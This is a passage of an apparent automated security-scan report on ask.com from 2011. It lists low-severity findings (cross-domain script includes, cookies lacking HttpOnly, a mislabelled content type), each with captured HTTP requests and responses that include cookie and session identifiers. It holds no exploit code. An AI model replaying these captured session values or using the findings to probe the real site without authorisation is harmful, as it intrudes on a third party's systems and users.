Issue detail
The response dynamically includes the following script from another domain: http://api.recaptcha.net/js/recaptcha_ajax.js
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:09:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118233 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... </script> <script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"> </script>...[SNIP]...
8.3. http://www.ask.com/pictures
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The response dynamically includes the following script from another domain: http://api.recaptcha.net/js/recaptcha_ajax.js
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:50 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106391 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... </script> <script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"> </script>...[SNIP]...
8.4. http://www.ask.com/pictureslanding
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The response dynamically includes the following scripts from other domains:
http://api.recaptcha.net/js/recaptcha_ajax.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:02 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59137 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... </script><script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>...[SNIP]... </script> <script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"> </script>...[SNIP]...
9. Cookie without HttpOnly flag set
There are 5 instances of this issue:
9.1. http://www.ask.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
user=o=0&l=dir; Domain=.ask.com; Path=/
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:28 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Content-Length: 94462 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]...
9.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:09:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118233 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]...
9.3. http://www.ask.com/ja-ask-dialog
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /ja-ask-dialog
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]...
9.4. http://www.ask.com/pictures
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictures
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:50 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106391 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]...
9.5. http://www.ask.com/pictureslanding
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:02 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59137 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]...
10. Content type incorrectly stated
Summary
Severity: Information
Confidence: Firm
Host: http://www.ask.com
Path: /ja-local-zoom
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html;charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain JSON.
Request
GET /ja-local-zoom HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:09:41 GMT Connection: close Vary: Accept-Encoding Content-Length: 82 {"locationList":[{"city":"Irving","state":"TX"},{"city":"Mesquite","state":"TX"}]}